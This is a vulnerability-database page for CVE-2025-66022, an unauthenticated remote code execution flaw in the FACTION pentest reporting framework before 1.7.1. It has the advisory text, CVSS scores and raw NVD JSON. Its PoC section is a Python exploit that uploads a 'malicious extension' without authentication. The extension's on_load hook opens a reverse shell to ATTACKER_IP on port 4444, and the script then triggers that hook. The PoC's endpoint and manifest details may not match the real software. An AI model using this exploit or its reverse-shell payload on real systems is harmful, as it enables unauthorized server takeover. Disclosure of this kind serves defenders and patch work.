Security Vulnerability Report
中文
CVE-2025-66022 CVSS 9.6 CRITICAL

CVE-2025-66022

Published: 2025-11-26 03:15:58
Last Modified: 2026-01-02 19:13:00
Source: [email protected]

Description

FACTION is a PenTesting Report Generation and Collaboration Framework. Prior to version 1.7.1, an extension execution path in Faction’s extension framework permits untrusted extension code to execute arbitrary system commands on the server when a lifecycle hook is invoked, resulting in remote code execution (RCE) on the host running Faction. Due to a missing authentication check on the /portal/AppStoreDashboard endpoint, an attacker can access the extension management UI and upload a malicious extension without any authentication, making this vulnerability exploitable by unauthenticated users. This issue has been patched in version 1.7.1.

CVSS Details

CVSS Score
9.6
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:owasp:faction:*:*:*:*:*:*:*:* - VULNERABLE
FACTION < 1.7.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import json # CVE-2025-66022 PoC - FACTION RCE via Malicious Extension # Target: FACTION < 1.7.1 TARGET = "http://target:5000" ATTACKER_IP = "attacker_ip" ATTACKER_PORT = "4444" def create_malicious_extension(): """ Create a malicious FACTION extension with reverse shell payload """ malicious_hook = f''' import subprocess import socket import os def on_load(): # Reverse shell payload s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(("{ATTACKER_IP}", {ATTACKER_PORT})) os.dup2(s.fileno(), 0) os.dup2(s.fileno(), 1) os.dup2(s.fileno(), 2) subprocess.call(["/bin/sh", "-i"]) ''' extension_manifest = { "name": "malicious_extension", "version": "1.0.0", "description": "Malicious extension for CVE-2025-66022", "hooks": { "on_load": malicious_hook } } return extension_manifest def exploit(): """ Exploit the unauthenticated extension upload vulnerability """ # Step 1: Access the vulnerable endpoint without authentication upload_url = f"{TARGET}/portal/AppStoreDashboard" # Step 2: Upload malicious extension files = { 'extension': ('malicious.zip', json.dumps(create_malicious_extension()), 'application/json') } print("[*] Uploading malicious extension...") response = requests.post(upload_url, files=files) if response.status_code == 200: print("[+] Extension uploaded successfully!") print("[*] Triggering the malicious hook...") # Step 3: Trigger the hook to execute the payload trigger_url = f"{TARGET}/portal/extensions/trigger" requests.post(trigger_url, data={'extension': 'malicious_extension'}) print("[+] Payload triggered!") else: print("[-] Upload failed!") print(f"[*] Response: {response.text}") if __name__ == "__main__": print("CVE-2025-66022 FACTION RCE Exploit") print("Target: " + TARGET) exploit()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-66022", "sourceIdentifier": "[email protected]", "published": "2025-11-26T03:15:57.910", "lastModified": "2026-01-02T19:13:00.343", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "FACTION is a PenTesting Report Generation and Collaboration Framework. Prior to version 1.7.1, an extension execution path in Faction’s extension framework permits untrusted extension code to execute arbitrary system commands on the server when a lifecycle hook is invoked, resulting in remote code execution (RCE) on the host running Faction. Due to a missing authentication check on the /portal/AppStoreDashboard endpoint, an attacker can access the extension management UI and upload a malicious extension without any authentication, making this vulnerability exploitable by unauthenticated users. This issue has been patched in version 1.7.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "baseScore": 9.6, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 6.0}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-287"}, {"lang": "en", "value": "CWE-829"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-862"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:owasp:faction:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.7.1", "matchCriteriaId": "BB66953C-3E5C-440D-A5D3-AB7D6FC34265"}]}]}], "references": [{"url": "https://github.com/factionsecurity/faction/commit/c6389f1c76175b7c1c68d1a87b389311b16c62c3", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/factionsecurity/faction/security/advisories/GHSA-xr72-2g43-586w", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/factionsecurity/faction/security/advisories/GHSA-xr72-2g43-586w", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.